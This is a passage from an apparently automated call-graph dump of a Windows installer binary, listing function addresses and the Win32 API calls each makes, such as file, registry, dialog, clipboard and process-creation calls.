3200->3210 3216 405620 61 API calls 3200->3216 3240 405cfb lstrcpynA 3200->3240 3202 4057e0 3201->3202 3203 4057c9 3201->3203 3204 404fe7 25 API calls 3202->3204 3203->3184 3207 4057cf 3203->3207 3204->3184 3205->3200 3208 405780 FindClose 3205->3208 3209 404fe7 25 API calls 3207->3209 3208->3195 3211 4057d7 3209->3211 3213 4059b3 2 API calls 3210->3213 3212 405a49 40 API calls 3211->3212 3214 4057de 3212->3214 3215 405735 DeleteFileA 3213->3215 3214->3184 3220 405740 3215->3220 3216->3200 3217 404fe7 25 API calls 3217->3205 3218 404fe7 25 API calls 3218->3220 3220->3205 3220->3217 3220->3218 3241 405a49 3220->3241 3267 405cfb lstrcpynA 3221->3267 3223 4058e0 3224 405882 4 API calls 3223->3224 3225 4058e6 3224->3225 3226 405634 3225->3226 3227 405f5d 5 API calls 3225->3227 3226->3182 3226->3183 3233 4058f6 3227->3233 3228 405921 lstrlenA 3229 40592c 3228->3229 3228->3233 3230 4057ee 3 API calls 3229->3230 3232 405931 GetFileAttributesA 3230->3232 3231 405ff6 2 API calls 3231->3233 3232->3226 3233->3226 3233->3228 3233->3231 3234 405835 2 API calls 3233->3234 3234->3228 3235->3186 3237 405842 3236->3237 3238 405853 3237->3238 3239 405847 CharPrevA 3237->3239 3238->3190 3239->3237 3239->3238 3240->3200 3268 406087 GetModuleHandleA 3241->3268 3244 405ab1 GetShortPathNameA 3246 405ac6 3244->3246 3247 405ba6 3244->3247 3246->3247 3249 405ace wsprintfA 3246->3249 3247->3220 3248 405a95 CloseHandle GetShortPathNameA 3248->3247 3250 405aa9 3248->3250 3251 405d1d 18 API calls 3249->3251 3250->3244 3250->3247 3252 405af6 3251->3252 3275 4059d2 GetFileAttributesA CreateFileA 3252->3275 3254 405b03 3254->3247 3255 405b12 GetFileSize GlobalAlloc 3254->3255 3256 405b30 ReadFile 3255->3256 3257 405b9f CloseHandle 3255->3257 3256->3257 3258 405b44 3256->3258 3257->3247 3258->3257 3276 405947 lstrlenA 3258->3276 3261 405bb3 3263 405947 4 API calls 3261->3263 3262 405b59 3281 405cfb lstrcpynA 3262->3281 3265 405b67 3263->3265 3266 405b7a SetFilePointer WriteFile GlobalFree 3265->3266 3266->3257 3267->3223 3269 4060a3 3268->3269 3270 4060ad GetProcAddress 3268->3270 3282 40601d GetSystemDirectoryA 3269->3282 3273 405a54 3270->3273 3272 4060a9 3272->3270 3272->3273 3273->3244 3273->3247 3274 4059d2 GetFileAttributesA CreateFileA 3273->3274 3274->3248 3275->3254 3277 40597d lstrlenA 3276->3277 3278 40595b lstrcmpiA 3277->3278 3280 405987 3277->3280 3279 405974 CharNextA 3278->3279 3278->3280 3279->3277 3280->3261 3280->3262 3281->3265 3283 40603f wsprintfA LoadLibraryA 3282->3283 3283->3272 3670 4025e2 3671 4025e9 3670->3671 3673 40284e 3670->3673 3672 4029ef 18 API calls 3671->3672 3674 4025f4 3672->3674 3675 4025fb SetFilePointer 3674->3675 3675->3673 3676 40260b 3675->3676 3678 405c59 wsprintfA 3676->3678 3678->3673 3679 403ae4 3680 403c37 3679->3680 3681 403afc 3679->3681 3682 403c88 3680->3682 3683 403c48 GetDlgItem GetDlgItem 3680->3683 3681->3680 3684 403b08 3681->3684 3688 403ce2 3682->3688 3696 401389 2 API calls 3682->3696 3764 403fb7 3683->3764 3685 403b13 SetWindowPos 3684->3685 3686 403b26 3684->3686 3685->3686 3689 403b43 3686->3689 3690 403b2b ShowWindow 3686->3690 3692 404003 SendMessageA 3688->3692 3738 403c32 3688->3738 3693 403b65 3689->3693 3694 403b4b DestroyWindow 3689->3694 3690->3689 3691 403c72 SetClassLongA 3695 40140b 2 API calls 3691->3695 3736 403cf4 3692->3736 3697 403b6a SetWindowLongA 3693->3697 3698 403b7b 3693->3698 3746 403f40 3694->3746 3695->3682 3699 403cba 3696->3699 3697->3738 3702 403b87 GetDlgItem 3698->3702 3715 403bf2 3698->3715 3699->3688 3703 403cbe SendMessageA 3699->3703 3700 40140b 2 API calls 3700->3736 3701 403f42 DestroyWindow EndDialog 3701->3746 3705 403b9a SendMessageA IsWindowEnabled 3702->3705 3708 403bb7 3702->3708 3703->3738 3704 403f71 ShowWindow 3704->3738 3705->3708 3705->3738 3707 405d1d 18 API calls 3707->3736 3709 403bc4 3708->3709 3710 403bd7 3708->3710 3711 403c0b SendMessageA 3708->3711 3719 403bbc 3708->3719 3709->3711 3709->3719 3713 403bf4 3710->3713 3714 403bdf 3710->3714 3711->3715 3717 40140b 2 API calls 3713->3717 3716 40140b 2 API calls 3714->3716 3750 40401e 3715->3750 3716->3719 3717->3719 3718 403fb7 19 API calls 3718->3736 3719->3715 3747 403f90 3719->3747 3720 403fb7 19 API calls 3721 403d6f GetDlgItem 3720->3721 3722 403d84 3721->3722 3723 403d8c ShowWindow EnableWindow 3721->3723 3722->3723 3767 403fd9 EnableWindow 3723->3767 3725 403db6 EnableWindow 3728 403dca 3725->3728 3726 403dcf GetSystemMenu EnableMenuItem SendMessageA 3727 403dff SendMessageA 3726->3727 3726->3728 3727->3728 3728->3726 3768 403fec SendMessageA 3728->3768 3769 405cfb lstrcpynA 3728->3769 3731 403e2d lstrlenA 3732 405d1d 18 API calls 3731->3732 3733 403e3e SetWindowTextA 3732->3733 3734 401389 2 API calls 3733->3734 3734->3736 3735 403e82 DestroyWindow 3737 403e9c CreateDialogParamA 3735->3737 3735->3746 3736->3700 3736->3701 3736->3707 3736->3718 3736->3720 3736->3735 3736->3738 3739 403ecf 3737->3739 3737->3746 3740 403fb7 19 API calls 3739->3740 3741 403eda GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3740->3741 3742 401389 2 API calls 3741->3742 3743 403f20 3742->3743 3743->3738 3744 403f28 ShowWindow 3743->3744 3745 404003 SendMessageA 3744->3745 3745->3746 3746->3704 3746->3738 3748 403f97 3747->3748 3749 403f9d SendMessageA 3747->3749 3748->3749 3749->3715 3751 4040bf 3750->3751 3752 404036 GetWindowLongA 3750->3752 3751->3738 3752->3751 3753 404047 3752->3753 3754 404056 GetSysColor 3753->3754 3755 404059 3753->3755 3754->3755 3756 404069 SetBkMode 3755->3756 3757 40405f SetTextColor 3755->3757 3758 404081 GetSysColor 3756->3758 3759 404087 3756->3759 3757->3756 3758->3759 3760 404098 3759->3760 3761 40408e SetBkColor 3759->3761 3760->3751 3762 4040b2 CreateBrushIndirect 3760->3762 3763 4040ab DeleteObject 3760->3763 3761->3760 3762->3751 3763->3762 3765 405d1d 18 API calls 3764->3765 3766 403fc2 SetDlgItemTextA 3765->3766 3766->3691 3767->3725 3768->3728 3769->3731 3770 401ae5 3771 402a0c 18 API calls 3770->3771 3772 401aec 3771->3772 3773 4029ef 18 API calls 3772->3773 3774 401af5 wsprintfA 3773->3774 3775 4028a1 3774->3775 3776 4019e6 3777 402a0c 18 API calls 3776->3777 3778 4019ef ExpandEnvironmentStringsA 3777->3778 3779 401a03 3778->3779 3781 401a16 3778->3781 3780 401a08 lstrcmpA 3779->3780 3779->3781 3780->3781 3782 401f67 3783 401f79 3782->3783 3792 402028 3782->3792 3784 402a0c 18 API calls 3783->3784 3785 401f80 3784->3785 3787 402a0c 18 API calls 3785->3787 3786 401423 25 API calls 3793 40217f 3786->3793 3788 401f89 3787->3788 3789 401f91 GetModuleHandleA 3788->3789 3790 401f9e LoadLibraryExA 3788->3790 3789->3790 3791 401fae GetProcAddress 3789->3791 3790->3791 3790->3792 3794 401ffb 3791->3794 3795 401fbe 3791->3795 3792->3786 3796 404fe7 25 API calls 3794->3796 3797 401423 25 API calls 3795->3797 3798 401fce 3795->3798 3796->3798 3797->3798 3798->3793 3799 40201c FreeLibrary 3798->3799 3799->3793 3814 401c6d 3815 4029ef 18 API calls 3814->3815 3816 401c73 IsWindow 3815->3816 3817 4019d6 3816->3817 3818 4014f0 SetForegroundWindow 3819 4028a1 3818->3819 3827 4043f5 3828 404421 3827->3828 3829 404432 3827->3829 3888 4055a0 GetDlgItemTextA 3828->3888 3830 40443e GetDlgItem 3829->3830 3837 40449d 3829->3837 3832 404452 3830->3832 3836 404466 SetWindowTextA 3832->3836 3840 405882 4 API calls 3832->3840 3833 404581 3886 40472b 3833->3886 3890 4055a0 GetDlgItemTextA 3833->3890 3834 40442c 3835 405f5d 5 API calls 3834->3835 3835->3829 3841 403fb7 19 API calls 3836->3841 3837->3833 3842 405d1d 18 API calls 3837->3842 3837->3886 3839 40401e 8 API calls 3844 40473f 3839->3844 3845 40445c 3840->3845 3846 404482 3841->3846 3847 404511 SHBrowseForFolderA 3842->3847 3843 4045b1 3848 4058cf 18 API calls 3843->3848 3845->3836 3852 4057ee 3 API calls 3845->3852 3849 403fb7 19 API calls 3846->3849 3847->3833 3850 404529 CoTaskMemFree 3847->3850 3851 4045b7 3848->3851 3853 404490 3849->3853 3854 4057ee 3 API calls 3850->3854 3891 405cfb lstrcpynA 3851->3891 3852->3836 3889 403fec SendMessageA 3853->3889 3857 404536 3854->3857 3859 40456d SetDlgItemTextA 3857->3859 3863 405d1d 18 API calls 3857->3863 3858 404496 3861 406087 5 API calls 3858->3861 3859->3833 3860 4045ce 3862 406087 5 API calls 3860->3862 3861->3837 3864 4045d5 3862->3864 3865 404555 lstrcmpiA 3863->3865 3866 404611 3864->3866 3874 405835 2 API calls 3864->3874 3875 404669 3864->3875 3865->3859 3867 404566 lstrcatA 3865->3867 3892 405cfb lstrcpynA 3866->3892 3867->3859 3869 404618 3870 405882 4 API calls 3869->3870 3871 40461e GetDiskFreeSpaceA 3870->3871 3873 404642 MulDiv 3871->3873 3871->3875 3873->3875 3874->3864 3876 4046da 3875->3876 3893 404871 3875->3893 3878 4046fd 3876->3878 3880 40140b 2 API calls 3876->3880 3904 403fd9 EnableWindow 3878->3904 3880->3878 3881 4046dc SetDlgItemTextA 3881->3876 3882 4046cc 3896 4047ac 3882->3896 3885 404719 3885->3886 3905 40438a 3885->3905 3886->3839 3888->3834 3889->3858 3890->3843 3891->3860 3892->3869 3894 4047ac 21 API calls 3893->3894 3895 4046c7 3894->3895 3895->3881 3895->3882 3897 4047c2 3896->3897 3898 405d1d 18 API calls 3897->3898 3899 404826 3898->3899 3900 405d1d 18 API calls 3899->3900 3901 404831 3900->3901 3902 405d1d 18 API calls 3901->3902 3903 404847 lstrlenA wsprintfA SetDlgItemTextA 3902->3903 3903->3876 3904->3885 3906 404398 3905->3906 3907 40439d SendMessageA 3905->3907 3906->3907 3907->3886 3908 4016fa 3909 402a0c 18 API calls 3908->3909 3910 401701 SearchPathA 3909->3910 3911 40171c 3910->3911 3913 4027cc 3910->3913 3911->3913 3914 405cfb lstrcpynA 3911->3914 3914->3913 3915 40287c SendMessageA 3916 4028a1 3915->3916 3917 402896 InvalidateRect 3915->3917 3917->3916 3918 40227d 3919 402a0c 18 API calls 3918->3919 3920 40228b 3919->3920 3921 402a0c 18 API calls 3920->3921 3922 402294 3921->3922 3923 402a0c 18 API calls 3922->3923 3924 40229e GetPrivateProfileStringA 3923->3924 3925 4014fe 3926 401506 3925->3926 3928 401519 3925->3928 3927 4029ef 18 API calls 3926->3927 3927->3928 3936 4040ff 3937 404115 3936->3937 3942 404222 3936->3942 3939 403fb7 19 API calls 3937->3939 3938 404291 3940 404365 3938->3940 3941 40429b GetDlgItem 3938->3941 3943 40416b 3939->3943 3946 40401e 8 API calls 3940->3946 3947 4042b1 3941->3947 3948 404323 3941->3948 3942->3938 3942->3940 3944 404266 GetDlgItem SendMessageA 3942->3944 3945 403fb7 19 API calls 3943->3945 3967 403fd9 EnableWindow 3944->3967 3950 404178 CheckDlgButton 3945->3950 3951 404360 3946->3951 3947->3948 3952 4042d7 6 API calls 3947->3952 3948->3940 3953 404335 3948->3953 3965 403fd9 EnableWindow 3950->3965 3952->3948 3956 40433b SendMessageA 3953->3956 3957 40434c 3953->3957 3954 40428c 3958 40438a SendMessageA 3954->3958 3956->3957 3957->3951 3960 404352 SendMessageA 3957->3960 3958->3938 3959 404196 GetDlgItem 3966 403fec SendMessageA 3959->3966 3960->3951 3962 4041ac SendMessageA 3963 4041d3 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3962->3963 3964 4041ca GetSysColor 3962->3964 3963->3951 3964->3963 3965->3959 3966->3962 3967->3954 3968 401000 3969 401037 BeginPaint GetClientRect 3968->3969 3971 40100c DefWindowProcA 3968->3971 3972 4010f3 3969->3972 3973 401179 3971->3973 3974 401073 CreateBrushIndirect FillRect DeleteObject 3972->3974 3975 4010fc 3972->3975 3974->3972 3976 401102 CreateFontIndirectA 3975->3976 3977 401167 EndPaint 3975->3977 3976->3977 3978 401112 6 API calls 3976->3978 3977->3973 3978->3977 3979 402188 3980 402a0c 18 API calls 3979->3980 3981 40218e 3980->3981 3982 402a0c 18 API calls 3981->3982 3983 402197 3982->3983 3984 402a0c 18 API calls 3983->3984 3985 4021a0 3984->3985 3986 405ff6 2 API calls 3985->3986 3987 4021a9 3986->3987 3988 4021ba lstrlenA lstrlenA 3987->3988 3989 4021ad 3987->3989 3991 404fe7 25 API calls 3988->3991 3990 404fe7 25 API calls 3989->3990 3993 4021b5 3989->3993 3990->3993 3992 4021f6 SHFileOperationA 3991->3992 3992->3989 3992->3993 3142 401389 3144 401390 3142->3144 3143 4013fe 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3994 40220a 3995 402211 3994->3995 3998 402224 3994->3998 3996 405d1d 18 API calls 3995->3996 3997 40221e 3996->3997 3999 4055bc MessageBoxIndirectA 3997->3999 3999->3998 4000 401c8a 4001 4029ef 18 API calls 4000->4001 4002 401c91 4001->4002 4003 4029ef 18 API calls 4002->4003 4004 401c99 GetDlgItem 4003->4004 4005 4024ce 4004->4005 4006 40370c 4007 403717 4006->4007 4008 40371e GlobalAlloc 4007->4008 4009 40371b 4007->4009 4008->4009 4010 401490 4011 404fe7 25 API calls 4010->4011 4012 401497 4011->4012 4013 402611 4014 402618 4013->4014 4016 4028a1 4013->4016 4015 40261e FindClose 4014->4015 4015->4016 4017 402692 4018 402a0c 18 API calls 4017->4018 4020 4026a0 4018->4020 4019 4026b6 4022 4059b3 2 API calls 4019->4022 4020->4019 4021 402a0c 18 API calls 4020->4021 4021->4019 4023 4026bc 4022->4023 4043 4059d2 GetFileAttributesA CreateFileA 4023->4043 4025 4026c9 4026 402772 4025->4026 4027 4026d5 GlobalAlloc 4025->4027 4030 40277a DeleteFileA 4026->4030 4031 40278d 4026->4031 4028 402769 CloseHandle 4027->4028 4029 4026ee 4027->4029 4028->4026 4044 403207 SetFilePointer 4029->4044 4030->4031 4033 4026f4 4034 4031d5 ReadFile 4033->4034 4035 4026fd GlobalAlloc 4034->4035 4036 402741 WriteFile GlobalFree 4035->4036 4037 40270d 4035->4037 4039 402f2e 48 API calls 4036->4039 4038 402f2e 48 API calls 4037->4038 4042 40271a 4038->4042 4040 402766 4039->4040 4040->4028 4041 402738 GlobalFree 4041->4036 4042->4041 4043->4025 4044->4033 4045 401595 4046 402a0c 18 API calls 4045->4046 4047 40159c SetFileAttributesA 4046->4047 4048 4015ae 4047->4048 4049 401e95 4050 402a0c 18 API calls 4049->4050 4051 401e9c 4050->4051 4052 405ff6 2 API calls 4051->4052 4053 401ea2 4052->4053 4055 401eb4 4053->4055 4056 405c59 wsprintfA 4053->4056 4056->4055 4057 401696 4058 402a0c 18 API calls 4057->4058 4059 40169c GetFullPathNameA 4058->4059 4060 4016b3 4059->4060 4066 4016d4 4059->4066 4063 405ff6 2 API calls 4060->4063 4060->4066 4061 4028a1 4062 4016e8 GetShortPathNameA 4062->4061 4064 4016c4 4063->4064 4064->4066 4067 405cfb lstrcpynA 4064->4067 4066->4061 4066->4062 4067->4066 4075 402319 4076 40231f 4075->4076 4077 402a0c 18 API calls 4076->4077 4078 402331 4077->4078 4079 402a0c 18 API calls 4078->4079 4080 40233b RegCreateKeyExA 4079->4080 4081 4028a1 4080->4081 4082 402365 4080->4082 4083 40237d 4082->4083 4084 402a0c 18 API calls 4082->4084 4085 402389 4083->4085 4087 4029ef 18 API calls 4083->4087 4086 402376 lstrlenA 4084->4086 4088 4023a4 RegSetValueExA 4085->4088 4089 402f2e 48 API calls 4085->4089 4086->4083 4087->4085 4090 4023ba RegCloseKey 4088->4090 4089->4088 4090->4081 4092 402819 4093 4029ef 18 API calls 4092->4093 4094 40281f 4093->4094 4095 402672 4094->4095 4096 402850 4094->4096 4097 40282d 4094->4097 4096->4095 4098 405d1d 18 API calls 4096->4098 4097->4095 4100 405c59 wsprintfA 4097->4100 4098->4095 4100->4095 3146 401e1b 3147 402a0c 18 API calls 3146->3147 3148 401e21 3147->3148 3149 404fe7 25 API calls 3148->3149 3150 401e2b 3149->3150 3162 40555b CreateProcessA 3150->3162 3152 402672 3153 401e87 CloseHandle 3153->3152 3154 401e50 WaitForSingleObject 3155 401e31 3154->3155 3156 401e5e GetExitCodeProcess 3154->3156 3155->3152 3155->3153 3155->3154 3159 4060c3 2 API calls 3155->3159 3157 401e70 3156->3157 3158 401e7b 3156->3158 3165 405c59 wsprintfA 3157->3165 3158->3153 3161 401e79 3158->3161 3159->3154 3161->3153 3163 405596 3162->3163 3164 40558a CloseHandle 3162->3164 3163->3155 3164->3163 3165->3161 4101 401d1b GetDC GetDeviceCaps 4102 4029ef 18 API calls 4101->4102 4103 401d37 MulDiv 4102->4103 4104 4029ef 18 API calls 4103->4104 4105 401d4c 4104->4105 4106 405d1d 18 API calls 4105->4106 4107 401d85 CreateFontIndirectA 4106->4107 4108 4024ce 4107->4108 4108->4108 4109 40251c 4110 4029ef 18 API calls 4109->4110 4111 402526 4110->4111 4112 40255a ReadFile 4111->4112 4113 40259e 4111->4113 4115 4025ae 4111->4115 4117 40259c 4111->4117 4112->4111 4112->4117 4118 405c59 wsprintfA 4113->4118 4116 4025c4 SetFilePointer 4115->4116 4115->4117 4116->4117 4118->4117 2933 401721 2939 402a0c 2933->2939 2937 40172f 2938 405a01 2 API calls 2937->2938 2938->2937 2940 402a18 2939->2940 2949 405d1d 2940->2949 2943 401728 2945 405a01 2943->2945 2946 405a0c GetTickCount GetTempFileNameA 2945->2946 2947 405a3c 2946->2947 2948 405a38 2946->2948 2947->2937 2948->2946 2948->2947 2959 405d2a 2949->2959 2950 405f44 2951 402a39 2950->2951 2984 405cfb lstrcpynA 2950->2984 2951->2943 2968 405f5d 2951->2968 2953 405dc2 GetVersion 2954 405dcf 2953->2954 2954->2959 2961 405e3a GetSystemDirectoryA 2954->2961 2962 405e4d GetWindowsDirectoryA 2954->2962 2964 405d1d 10 API calls 2954->2964 2965 405ec4 lstrcatA 2954->2965 2966 405e81 SHGetSpecialFolderLocation 2954->2966 2977 405be2 RegOpenKeyExA 2954->2977 2955 405f1b lstrlenA 2955->2959 2958 405d1d 10 API calls 2958->2955 2959->2950 2959->2953 2959->2955 2959->2958 2963 405f5d 5 API calls 2959->2963 2982 405c59 wsprintfA 2959->2982 2983 405cfb lstrcpynA 2959->2983 2961->2954 2962->2954 2963->2959 2964->2954 2965->2959 2966->2954 2967 405e99 SHGetPathFromIDListA CoTaskMemFree 2966->2967 2967->2954 2974 405f69 2968->2974 2969 405fd1 2970 405fd5 CharPrevA 2969->2970 2973 405ff0 2969->2973 2970->2969 2971 405fc6 CharNextA 2971->2969 2971->2974 2973->2943 2974->2969 2974->2971 2975 405fb4 CharNextA 2974->2975 2976 405fc1 CharNextA 2974->2976 2985 405819 2974->2985 2975->2974 2976->2971 2978 405c53 2977->2978 2979 405c15 RegQueryValueExA 2977->2979 2978->2954 2980 405c36 RegCloseKey 2979->2980 2980->2978 2982->2959 2983->2959 2984->2951 2986 40581f 2985->2986 2987 405832 2986->2987 2988 405825 CharNextA 2986->2988 2987->2974 2988->2986 4119 401922 4120 402a0c 18 API calls 4119->4120 4121 401929 lstrlenA 4120->4121 4122 4024ce 4121->4122 4123 405125 4124 4052d1 4123->4124 4125 405146 GetDlgItem GetDlgItem GetDlgItem 4123->4125 4127 405302 4124->4127 4128 4052da GetDlgItem CreateThread CloseHandle 4124->4128 4169 403fec SendMessageA 4125->4169 4130 40532d 4127->4130 4131 405319 ShowWindow ShowWindow 4127->4131 4132 40534f 4127->4132 4128->4127 4129 4051b7 4135 4051be GetClientRect GetSystemMetrics SendMessageA SendMessageA 4129->4135 4133 40538b 4130->4133 4137 405364 ShowWindow 4130->4137 4138 40533e 4130->4138 4171 403fec SendMessageA 4131->4171 4134 40401e 8 API calls 4132->4134 4133->4132 4143 405396 SendMessageA 4133->4143 4149 40535d 4134->4149 4141 405211 SendMessageA SendMessageA 4135->4141 4142 40522d 4135->4142 4139 405384 4137->4139 4140 405376 4137->4140 4144 403f90 SendMessageA 4138->4144 4146 403f90 SendMessageA 4139->4146 4145 404fe7 25 API calls 4140->4145 4141->4142 4147 405240 4142->4147 4148 405232 SendMessageA 4142->4148 4143->4149 4150 4053af CreatePopupMenu 4143->4150 4144->4132 4145->4139 4146->4133 4152 403fb7 19 API calls 4147->4152 4148->4147 4151 405d1d 18 API calls 4150->4151 4153 4053bf AppendMenuA 4151->4153 4154 405250 4152->4154 4155 4053d2 GetWindowRect 4153->4155 4156 4053e5 4153->4156 4157 405259 ShowWindow 4154->4157 4158 40528d GetDlgItem SendMessageA 4154->4158 4159 4053ee TrackPopupMenu 4155->4159 4156->4159 4160 40527c 4157->4160 4161 40526f ShowWindow 4157->4161 4158->4149 4162 4052b4 SendMessageA SendMessageA 4158->4162 4159->4149 4163 40540c 4159->4163 4170 403fec SendMessageA 4160->4170 4161->4160 4162->4149 4164 405428 SendMessageA 4163->4164 4164->4164 4166 405445 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4164->4166 4167 405467 SendMessageA 4166->4167 4167->4167 4168 405488 GlobalUnlock SetClipboardData CloseClipboard 4167->4168 4168->4149 4169->4129 4170->4158 4171->4130 4172 401ca5 4173 4029ef 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 4028a1 4174->4175 4176 401a26 4177 4029ef 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029ef 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 406a26 4184 4061b7 4181->4184 4182 406241 GlobalAlloc 4182->4184 4185 406b22 4182->4185 4183 406238 GlobalFree 4183->4182 4184->4182 4184->4183 4184->4184 4184->4185 4186 4062b8 GlobalAlloc 4184->4186 4187 4062af GlobalFree 4184->4187 4186->4184 4186->4185 4187->4186 4188 40262b 4189 402646 4188->4189 4190 40262e 4188->4190 4191 4027cc 4189->4191 4194 405cfb lstrcpynA 4189->4194 4192 40263b FindNextFileA 4190->4192 4192->4189 4194->4191 4195 401bad 4196 4029ef 18 API calls 4195->4196 4197 401bb4 4196->4197 4198 4029ef 18 API calls 4197->4198 4199 401bbe 4198->4199 4200 401bce 4199->4200 4201 402a0c 18 API calls 4199->4201 4202 401bde 4200->4202 4203 402a0c 18 API calls 4200->4203 4201->4200 4204 401be9 4202->4204 4205 401c2d 4202->4205 4203->4202 4207 4029ef 18 API calls 4204->4207 4206 402a0c 18 API calls 4205->4206 4209 401c32 4206->4209 4208 401bee 4207->4208 4210 4029ef 18 API calls 4208->4210 4211 402a0c 18 API calls 4209->4211 4212 401bf7 4210->4212 4213 401c3b FindWindowExA 4211->4213 4214 401c1d SendMessageA 4212->4214 4215 401bff SendMessageTimeoutA 4212->4215 4216 401c59 4213->4216 4214->4216 4215->4216 4217 4043ae 4218 4043e4 4217->4218 4219 4043be 4217->4219 4221 40401e 8 API calls 4218->4221 4220 403fb7 19 API calls 4219->4220 4222 4043cb SetDlgItemTextA 4220->4222 4223 4043f0 4221->4223 4222->4218 4224 4024b2 4225 402a0c 18 API calls 4224->4225 4226 4024b9 4225->4226 4229 4059d2 GetFileAttributesA CreateFileA 4226->4229 4228 4024c5 4229->4228 2989 4015b3 2990 402a0c 18 API calls 2989->2990 2991 4015ba 2990->2991 3007 405882 CharNextA CharNextA 2991->3007 2993 4015c2 2994 40160a 2993->2994 2995 405819 CharNextA 2993->2995 2996 40162d 2994->2996 2997 40160f 2994->2997 2998 4015d0 CreateDirectoryA 2995->2998 3001 401423 25 API calls 2996->3001 3013 401423 2997->3013 2998->2993 3000 4015e5 GetLastError 2998->3000 3000->2993 3003 4015f2 GetFileAttributesA 3000->3003 3006 40217f 3001->3006 3003->2993 3005 401621 SetCurrentDirectoryA 3005->3006 3008 4058a8 3007->3008 3009 40589c 3007->3009 3011 405819 CharNextA 3008->3011 3012 4058c5 3008->3012 3009->3008 3010 4058a3 CharNextA 3009->3010 3010->3012 3011->3008 3012->2993 3017 404fe7 3013->3017 3016 405cfb lstrcpynA 3016->3005 3018 401431 3017->3018 3019 405002 3017->3019 3018->3016 3020 40501f lstrlenA 3019->3020 3021 405d1d 18 API calls 3019->3021 3022 405048 3020->3022 3023 40502d lstrlenA 3020->3023 3021->3020 3025 40505b 3022->3025 3026 40504e SetWindowTextA 3022->3026 3023->3018 3024 40503f lstrcatA 3023->3024 3024->3022 3025->3018 3027 405061 SendMessageA SendMessageA SendMessageA 3025->3027 3026->3025 3027->3018 4230 406333 4232 4061b7 4230->4232 4231 406b22 4232->4231 4233 406241 GlobalAlloc 4232->4233 4234 406238 GlobalFree 4232->4234 4235 4062b8 GlobalAlloc 4232->4235 4236 4062af GlobalFree 4232->4236 4233->4231 4233->4232 4234->4233 4235->4231 4235->4232 4236->4235 3028 401734 3029 402a0c 18 API calls 3028->3029 3030 40173b 3029->3030 3031 401761 3030->3031 3032 401759 3030->3032 3083 405cfb lstrcpynA 3031->3083 3082 405cfb lstrcpynA 3032->3082 3035 40175f 3039 405f5d 5 API calls 3035->3039 3036 40176c 3084 4057ee lstrlenA CharPrevA 3036->3084 3058 40177e 3039->3058 3043 401795 CompareFileTime 3043->3058 3044 401859 3045 404fe7 25 API calls 3044->3045 3048 401863 3045->3048 3046 404fe7 25 API calls 3054 401845 3046->3054 3047 405cfb lstrcpynA 3047->3058 3067 402f2e 3048->3067 3051 40188a SetFileTime 3052 40189c FindCloseChangeNotification 3051->3052 3052->3054 3055 4018ad 3052->3055 3053 405d1d 18 API calls 3053->3058 3056 4018b2 3055->3056 3057 4018c5 3055->3057 3059 405d1d 18 API calls 3056->3059 3060 405d1d 18 API calls 3057->3060 3058->3043 3058->3044 3058->3047 3058->3053 3065 401830 3058->3065 3066 4059d2 GetFileAttributesA CreateFileA 3058->3066 3087 405ff6 FindFirstFileA 3058->3087 3090 4059b3 GetFileAttributesA 3058->3090 3093 4055bc 3058->3093 3062 4018ba lstrcatA 3059->3062 3063 4018cd 3060->3063 3062->3063 3064 4055bc MessageBoxIndirectA 3063->3064 3064->3054 3065->3046 3065->3054 3066->3058 3068 402f5b 3067->3068 3069 402f3f SetFilePointer 3067->3069 3097 403059 GetTickCount 3068->3097 3069->3068 3072 402f6c ReadFile 3073 402f8c 3072->3073 3081 401876 3072->3081 3074 403059 43 API calls 3073->3074 3073->3081 3075 402fa3 3074->3075 3076 40301e ReadFile 3075->3076 3079 402fb3 3075->3079 3075->3081 3076->3081 3078 402fce ReadFile 3078->3079 3078->3081 3079->3078 3080 402fe7 WriteFile 3079->3080 3079->3081 3080->3079 3080->3081 3081->3051 3081->3052 3082->3035 3083->3036 3085 401772 lstrcatA 3084->3085 3086 405808 lstrcatA 3084->3086 3085->3035 3086->3085 3088 406017 3087->3088 3089 40600c FindClose 3087->3089 3088->3058 3089->3088 3091 4059c2 SetFileAttributesA 3090->3091 3092 4059cf 3090->3092 3091->3092 3092->3058 3096 4055d1 3093->3096 3094 40561d 3094->3058 3095 4055e5 MessageBoxIndirectA 3095->3094 3096->3094 3096->3095 3098 4031c3 3097->3098 3099 403088 3097->3099 3100 402be9 33 API calls 3098->3100 3110 403207 SetFilePointer 3099->3110 3107 402f64 3100->3107 3102 403093 SetFilePointer 3106 4030b8 3102->3106 3106->3107 3108 40314d WriteFile 3106->3108 3109 4031a4 SetFilePointer 3106->3109 3111 4031d5 ReadFile 3106->3111 3113 406184 3106->3113 3120 402be9 3106->3120 3107->3072 3107->3081 3108->3106 3108->3107 3109->3098 3110->3102 3112 4031f6 3111->3112 3112->3106 3114 4061a9 3113->3114 3115 4061b1 3113->3115 3114->3106 3115->3114 3116 406241 GlobalAlloc 3115->3116 3117 406238 GlobalFree 3115->3117 3118 4062b8 GlobalAlloc 3115->3118 3119 4062af GlobalFree 3115->3119 3116->3114 3116->3115 3117->3116 3118->3114 3118->3115 3119->3118 3121 402bf7 3120->3121 3122 402c0f 3120->3122 3123 402c00 DestroyWindow 3121->3123 3124 402c07 3121->3124 3125 402c17 3122->3125 3126 402c1f GetTickCount 3122->3126 3123->3124 3124->3106 3135 4060c3 3125->3135 3126->3124 3128 402c2d 3126->3128 3129 402c62 CreateDialogParamA ShowWindow 3128->3129 3130 402c35 3128->3130 3129->3124 3130->3124 3139 402bcd 3130->3139 3132 402c43 wsprintfA 3133 404fe7 25 API calls 3132->3133 3134 402c60 3133->3134 3134->3124 3136 4060e0 PeekMessageA 3135->3136 3137 4060f0 3136->3137 3138 4060d6 DispatchMessageA 3136->3138 3137->3124 3138->3136 3140 402bdc 3139->3140 3141 402bde MulDiv 3139->3141 3140->3141 3141->3132 4237 401634 4238 402a0c 18 API calls 4237->4238 4239 40163a 4238->4239 4240 405ff6 2 API calls 4239->4240 4241 401640 4240->4241 4242 401934 4243 4029ef 18 API calls 4242->4243 4244 40193b 4243->4244 4245 4029ef 18 API calls 4244->4245 4246 401945 4245->4246 4247 402a0c 18 API calls 4246->4247 4248 40194e 4247->4248 4249 401961 lstrlenA 4248->4249 4253 40199c 4248->4253 4250 40196b 4249->4250 4250->4253 4255 405cfb lstrcpynA 4250->4255 4252 401985 4252->4253 4254 